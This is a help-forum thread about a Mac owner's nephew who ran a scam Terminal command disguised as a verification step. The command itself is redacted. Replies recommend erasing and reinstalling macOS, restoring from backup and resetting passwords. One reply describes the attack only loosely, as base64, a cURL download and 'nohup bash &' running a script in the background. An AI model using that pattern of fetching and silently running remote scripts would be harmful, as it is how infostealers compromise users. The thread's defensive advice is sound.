Terminal scam! Advice needed please.

I see that the Moderator has already redacted the command in question.

However, there was another thread where the command that someone entered was a deliberately obscured version of "download an arbitrary script from a remote Web site, and then run that script". We don't know for certain what was in the script that the OP of that thread ran, but someone who grabbed a copy of a script from the same place – before the Moderators obscured the location – reported that it appeared to be full of all sorts of nasties.

Your nephew may need to assume that his machine has been so thoroughly compromised that "the only way to be sure is to take off and nuke the site from orbit", i.e. something along the lines of

• Erase the Mac and reinstall macOS from scratch
• Restore whatever data he can from a backup that was made before he ran the suspicious command
• Change all of his passwords

If he does not take such drastic action, it might be almost impossible to show that the machine was free of nasties, like, say, spyware designed to steal passwords, financial information, and information that would be useful to some criminal who wanted to commit identity fraud.

JBennet wrote:

Thank you leroydouglas, much appreciated!

If you say "post it again" are you referring to a new post or like this reply?

The command looks very similar starting with:

[Edited by Moderator]

Yes here as you posted— got the email for a look see, the Moderators edited / removed as expected.

It sure has the look of the dubious base64 code and cURL pulled off the internet, even seeing the abbreviated/limited code you posted as expected.

Not good.

All the red flags and alarm bells should be going off.

—You have the way forward: a complete erase/ reformat/re-install of the macOS,

—then restoring the user Data from backup— prior to the time the Terminal code was initiated.

All this would be found in the similar post referenced above....for more details tossed about.

How to reinstall macOS

 Recovery (both M1/M2/M3/M4 and Intel) — https://support.apple.com/en-us/HT204904

Restore your Mac from a backup  https://support.apple.com/en-us/102551

JBennet wrote:

Hi, thank you for your assistance. It seems the "moderator" will keep on deleting any info I try to add here. I honestly do not see the point of trying to post relevant "detailed" information if the "moderator" deletes it? Oye?

My nephew didn't use time machine and since we have no way of finding out what the terminal code may have compromised (no thanks to the "moderator") it seems he will have to do a clean install and loose a lot of the music he composed along with some of the apps and plugins he built up...

Thank you again leroydouglas, much appreciated.

Understood.

We do not want details of a malicious exploit posted in the public communities for eternity.

We all get email copies of your post once we participate— at least it is an option to receive email updates to the thread.

We get details you posted even if the details get removed in the community forum...

I tried to corroborate that point above.

At this time in the conversation it seems a moot point. You have the way forward a erase/clean install is the way forward; lesson learned about backups...yes sorry.

the rule of thumb—

f you value your user data

3-2-1 Backup Strategy: three copies of your data, two different methods, and one offsite.

More than one device, more than one backup methodology— and backup regularly.

Recognize and avoid phishing messages...

Recognize and avoid social engineering schemes including phishing messages, phony support calls, and other scams - Apple Support

Protecting against malware in macOS

Protecting against malware in macOS - Apple Support

Effective defenses against malware and other threats… - Apple Community

Effective defenses against malware and ot… - Apple Community

Security and your Apple Account Security and your Apple Account - Apple Support

Some outside references— detailed

https://www.bleepingcomputer.com/news/security/fake-mac-fixes-trick-users-into-installing-new-shamos-infostealer/

https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/

For simplicity, the article cited just above, "Restore your Mac from Backup" addresses ONLY the simpler case of using Migration Assistant to restore from the Most Recent Backup.

if you wish to access older data from just before the "bad stuff" was added, you need to ONLY create a new (or same as old) Admin account and do NOT restore from backup using Setup Assistant/Migration Assistant.

After initial setup, launch Time Machine.app, either by double clicking its Icon in the /Applications folder, or choosing "Browse Time Machine backups" off the Time Machine Icon in the MenuBar.

Then surf backward in time to just BEFORE the "bad stuff" was aded, and restore the entire Userid as of that date. You will see the complete files for each userid in the /Users directory, separately under each UserShortName.

If only one user was ever created, that is NOT treated as special case.

--------

You mentioned a nephew. If working with someone else on this project, remember these forums are openly available to be read and searched by all, and readers can add additional postings when logged in with their Apple-ID/Apple-Account.

This is quite possibly the same mess and the recovery steps, as was mentioned else-thread:

• https://discussions.apple.com/thread/256133893?sortBy=oldest_first

However… Triage applies. None of us have the resources (time, focus, access) to fix everything. Here, I would wonder whether someone making a cascade of errors is an addressable problem for anybody else. I would also wonder whether (not) resolving this might help them better focus on how to manage their equipment. Or might cause them to adopt the “que será, será” strategy; ignoring the mess, and continuing with whatever might happen.

With no backups and an inadequate filing system, they were already one mistake or one failure or one dunk or one theft away from mass data loss. And here we are.

As for remediation and recovery here, there isn’t a good path here. Not without those missing backups. They’re going to get to export their passwords, erase it all, restore just macOS, reinstall their apps, and start the “fun” of a global password reset. See the link to the previous thread.

Or they’ll skip some or all of the recovery steps and then seek help with the remnants, having seen this choice picked a little too often.

Triage? To avoid getting overwhelmed providing (paid) IT support, I had to set support request limits, particularly including not cleaning up messes I couldn’t prepare for. This is the classic IT support pitfall: all the responsibilities with none of the authority. Without setting the rules of engagement, last-minute panics — and with few or no means of non-heroic recovery — is not sustainable.

PS: Others in their circle (you, etc) will quite possibly get phishing messages, purportedly from them.

Time Machine saves, and can re-create, ANY Moment in time for which it still holds backup files.

If you have been using Time Machine with regularity...

AND you know when the "bad stuff" was added...

..and you have already ERASED everything and re-installed MacOS...

... you can use Time Machine.App (NOT Migration Assistant or Setup Assistant) to restore the state of your machine from just before the bad stuff was added.

Going into Terminal history, the following may be the code entered and the echo:

*****

JBennet—

If you post it again, we will get a copy of your post in email , before the mod's remove it again from the community here...

Otherwise I have no idea what is what here.

It does sound like a vulnerability.

Here was a reference to similar—

CASE IN POINT— here in it was a malicious exploit.

"i was opening a site and it wanted manual verfication for cloudflare through terminal"

Understanding and reversing a suspicious terminal command

ref: https://discussions.apple.com/thread/256133893?sortBy=oldest_first

See if this was in the string of the Terminal command that was redacted by the moderators...(?)

One of the concerns here part of the dubious base64 code which was not specifically comment on:

nohup bash & —command used in to run a Bash script or command in the background, ensuring it continues to execute even if the user logs out or closes the terminal

nohup – invoke a utility immune to hangups